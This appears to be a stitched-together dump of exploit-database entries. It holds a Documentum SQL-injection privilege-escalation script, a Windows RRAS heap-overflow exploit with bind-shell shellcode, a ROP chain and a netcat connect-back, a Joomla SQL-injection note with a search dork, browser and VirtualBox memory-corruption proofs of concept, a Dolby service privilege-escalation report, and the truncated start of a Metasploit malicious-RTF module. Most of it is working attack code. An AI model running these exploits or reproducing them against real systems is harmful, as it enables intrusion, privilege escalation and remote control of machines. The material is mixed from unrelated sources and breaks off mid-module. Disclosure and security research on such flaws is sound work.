~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
Here "union ..." allows to bypass check based on "id" call:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
select r_object_id from dm_sysobject where
r_object_id='0801fd08805c9dfe'
...
0801fd08805c9dfe
API> apply,c,,GET_LAST_SQL
...
q0
API> next,c,q0
...
OK
API> get,c,q0,result
...
select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
union select all dm_sysobject.r_object_id from dm_sysobject_sp
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)
API> close,c,q0
...
OK
Comma is required to bypass error in fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union
select r_object_id from dm_sysobject where r_object_id=
'0801fd08805c9dfe"
API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
OK
==========================================>8========================================
On August 2015 vendor had undertaken another attempt to remediate this vulnerability
check ESA-2015-131/CVE-2015-4533 for details.
On August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110
for detailed description - I just demonstrated another attack vector - using
UNION ALL keyword instead of UNION:
=================================8<================================
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
[DM_METHOD_E_METHOD_ARGS_INVALID]error:
"The arguments being passed to the method 'dm_bp_transition' are
invalid:
arguments contain sql keywords which are not allowed."
New attack vector (note ALL keyword):
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
=================================>8================================
Recently I have noticed that latest versions of Documentum Content
Server are not affected by the PoC provided above, however all versions
of Documentum Content Server are still vulnerable because vendor incorrectly
implemented input validation: they convert arguments to lower/upper-case,
replace line feed, carriage return and tab characters by a space,
remove double spaces, after that they check where resulting string contains
special keywords ('union ' and 'union all') or not - it is possible
to use other whitespace characters like backspace, which is demonstrated
in the PoC.
__
Regards,
Andrey B. Panfilov
CVE-2017-7221.py
'''
#!/usr/bin/env python
import socket
import sys
from os.path import basename
from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject
CIPHERS = "ALL:aNULL:!eNULL"
def usage():
print "usage:\n\t%s host port user password" % basename(sys.argv[0])
def main():
if len(sys.argv) != 5:
usage()
exit(1)
(session, docbase) = create_session(*sys.argv[1:5])
if is_super_user(session):
print "Current user is a superuser, nothing to do"
exit(1)
install_owner = session.serverconfig['r_install_owner']
document_id = session.next_id(0x08)
content_id = session.next_id(0x06)
store = session.get_by_qualification("dm_store")
format = session.get_by_qualification("dm_format where name='crtext'")
handle = session.make_pusher(store['r_object_id'])
if handle < 1:
print "Unable to create pusher"
exit(1)
data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
"\nByVal ObjectId As String,_" \
"\nByVal UserName As String,_" \
"\nByVal TargetState As String,_" \
"\nByRef ErrorString As String) As Boolean" \
"\nDim QueryID As String" \
"\nDim Query As String" \
"\nQuery = \"query,c,update dm_user objects set " \
"user_privileges=16 where user_name=\'%s\'\"" \
"\nQueryID = dmAPIGet(Query)" \
"\nQueryID = dmAPIExec(\"commit,c\")" \
"\nEntryCriteria=True" \
"\nEnd Function" % (sys.argv[3])
b = bytearray()
b.extend(data)
if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
print "Failed to start push"
exit(1)
session.upload(handle, b)
data_ticket = session.end_push_v2(handle)['DATA_TICKET']
procedure = False
try:
print "Trying to create dm_procedure"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_procedure")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2014-2513")
document.set_string("r_object_type", "dm_procedure")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if session.sys_obj_save(document_id, document):
procedure = True
except Exception, e:
print str(e)
if not procedure:
print "Failed to create dm_procedure"
print "Trying to create dm_sysobject"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_sysobject")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_string("owner_name", sys.argv[3])
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2017-7221")
document.set_string("r_object_type", "dm_sysobject")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if not session.sys_obj_save(document_id, document):
print "Failed to create dm_sysobject"
exit(1)
content = TypedObject(session=session)
content.set_string("OBJECT_TYPE", "dmr_content")
content.set_bool("IS_NEW_OBJECT", True)
content.set_id("storage_id", store['r_object_id'])
content.set_id("format", format['r_object_id'])
content.set_int("data_ticket", data_ticket)
content.set_id("parent_id", document_id)
content.set_int("page", 0)
content.set_string("full_format", format['name'])
content.set_int("content_size", len(b))
if not session.save_cont_attrs(content_id, content):
print "Failed to create content"
exit(1)
if procedure:
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
install_owner, session.session)
else:
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s,'' " \
"union\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
document_id, install_owner, session.session)
session.query(query)
r = session.query(
"select user_privileges from dm_user "
"where user_name=USER") \
.next_record()['user_privileges']
if r != 16:
print "Failed"
exit(1)
print "P0wned!"
def create_session(host, port, user, pwd, identity=None):
print "Trying to connect to %s:%s as %s ..." % \
(host, port, user)
session = None
try:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity)
except socket.error, e:
if e.errno == 54:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity,
secure=True, ciphers=CIPHERS)
else:
raise e
docbase = session.docbaseconfig['object_name']
version = session.serverconfig['r_server_version']
print "Connected to %s:%s, docbase: %s, version: %s" % \
(host, port, docbase, version)
return (session, docbase)
def is_super_user(session):
user = session.get_by_qualification(
"dm_user WHERE user_name=USER")
if user['user_privileges'] == 16:
return True
group = session.get_by_qualification(
"dm_group where group_name='dm_superusers' "
"AND any i_all_users_names=USER")
if group is not None:
return True
return False
if __name__ == '__main__':
main()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##################################################################################
# By Victor Portal (vportal) for educational porpouse only
##################################################################################
# This exploit is the python version of the ErraticGopher exploit probably #
# with some modifications. ErraticGopher exploits a memory corruption #
# (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. #
# Because the Magic bytes, the application redirects the execution to the #
# iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy #
# all te injected stub from the heap to the stack, overwritten a return #
# address as well as the SEH handler stored in the Stack, being possible #
# to control the execution flow to disable DEP and jump to the shellcode #
# as SYSTEM user. #
##################################################################################
#The exploit only works if target has the RRAS service enabled
#Tested on Windows Server 2003 SP2
import struct
import sys
import time
import os
from threading import Thread
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
target = sys.argv[1]
print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
#RRAS DCE-RPC CALL
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
#NX disable routine for Windows Server 2003 SP2
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
rop += "\x45"*16
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
rop += "\x5d\x7a\x81\x7c" #ret 20
rop += "\x71\x42\x38\x77" #jmp esp
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
rop += "\x90"*2 + egghunter + "\x90"*42
rop += "\x17\xf5\x83\x7c" #Disable NX routine
rop += "\x90"*4
stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
stub += "\x12" #Magic byte
stub += "\x46"*522
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes
dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function)
print "[-]Exploit sent to target successfully..."
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
# Exploit Title: Joomla Component Myportfolio 3.0.2 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba Kazemi (Mojtaba MobhaM)
# Home : https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/myportfolio/
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_myportfolio
# Tested on: Linux
# Date: 2017-04-24
# POC :
# pid Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?task=project&view=grid&id=1&pid=[SQL]&format=raw&option=com_myportfolio&Itemid=125
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1095
There is an out-of-bounds memcpy in Array.concat that can lead to memory corruption.
In builtins/ArrayPrototype.js, the function concatSlowPath calls a native method @appendMemcpy with a parameter resultIndex that is handled unsafely by the method. It calls JSArray::appendMemcpy, which calculates the memory size for the combined arrays as follows:
unsigned newLength = startIndex + otherLength;
If startIndex (resultIndex from concatSlowPath in JS) is very large, an integer overflow can occur, causing too small a buffer to be allocated, and copying to occur outside of the buffer.
It should be difficult to reach this state without a long execution time, because an array of length resultIndex needs to be allocated and copied before resultIndex is incremented, however if both arrays involved in the concatenation are of type ArrayWithUndecided JSArray::appendMemcpy returns true without copying, and resultIndex can be incremented with a low execution time.
Arrays of type ArrayWithUndecided are usually of length 0, however, it is possible to create one by calling Array.splice on an array with all undefined elements. This will cause an undefined Array of the delete length to be allocated, and then returned without it being written to, which would cause it to decide its type.
A minimal PoC is as follows, and a full PoC is attached.
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
-->
<html>
<body>
<script>
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
</script>
</body>
</html>
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227
We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.
We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.
It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).
If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:
>VirtualBoxKiller.exe E:\
Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:
--- cut ---
3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
--- cut ---
The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:
--- cut ---
1: kd> g
Critical error detected c0000374
Break instruction exception - code 80000003 (first chance)
ntdll!RtlReportCriticalFailure+0x2f:
0033:00000000`76f3f22f cc int 3
1: kd> kb
RetAddr : Args to Child : Call Site
00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:
--- cut ---
1: kd> g
=======================================
VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed.
000000000DCB1000 : Heap handle for the heap owning the block.
000000001C37E000 : Heap block being freed again.
0000000000000000 : Size of the heap block.
0000000000000000 : Not used
=======================================
This verifier stop is not continuable. Process will be terminated
when you use the `go' debugger command.
=======================================
1: kd> kb
RetAddr : Args to Child : Call Site
000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue.
References:
[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
#include <time.h>
extern "C"
NTSTATUS WINAPI NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_ PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ BOOLEAN ReturnSingleEntry,
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan
);
typedef struct _FILE_DIRECTORY_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
int main(int argc, char **argv) {
// Validate command line format.
if (argc != 2) {
printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
return 1;
}
// Initialize the PRNG.
srand((unsigned int)time(NULL));
// Create a subdirectory dedicated to demonstrating the vulnerability.
CHAR TmpDirectoryName[MAX_PATH];
_snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);
if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
printf("CreateDirectory failed, %d\n", GetLastError());
return 1;
}
// Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
CONST UINT kTempFilesCount = 16;
CONST UINT kTempFilenameLength = 128;
CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];
memset(TmpFilename, 'A', kTempFilenameLength);
TmpFilename[kTempFilenameLength] = '\0';
for (UINT i = 0; i < kTempFilesCount; i++) {
_snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("CreateFile#1 failed, %d\n", GetLastError());
return 1;
}
CloseHandle(hFile);
}
// Open the temporary directory.
HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDirectory == INVALID_HANDLE_VALUE) {
printf("CreateFile#2 failed, %d\n", GetLastError());
return 1;
}
IO_STATUS_BLOCK iosb;
FILE_DIRECTORY_INFORMATION fdi;
// Perform the first call, with ReturnSingleEntry set to FALSE.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);
// Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);
// We should never reach here.
CloseHandle(hDirectory);
return 0;
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075
Windows: Dolby Audio X2 Service Elevation of Privilege
Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
Class: Elevation of Privilege
Summary:
The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.
Description:
The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.
Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.
Proof of Concept:
To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.
1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad”
2) Check the currently running processes for the privileged copy of notepad,
Expected Result:
No privilege escalation occurs.
Observed Result:
An instance of notepad is running at system privileges.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
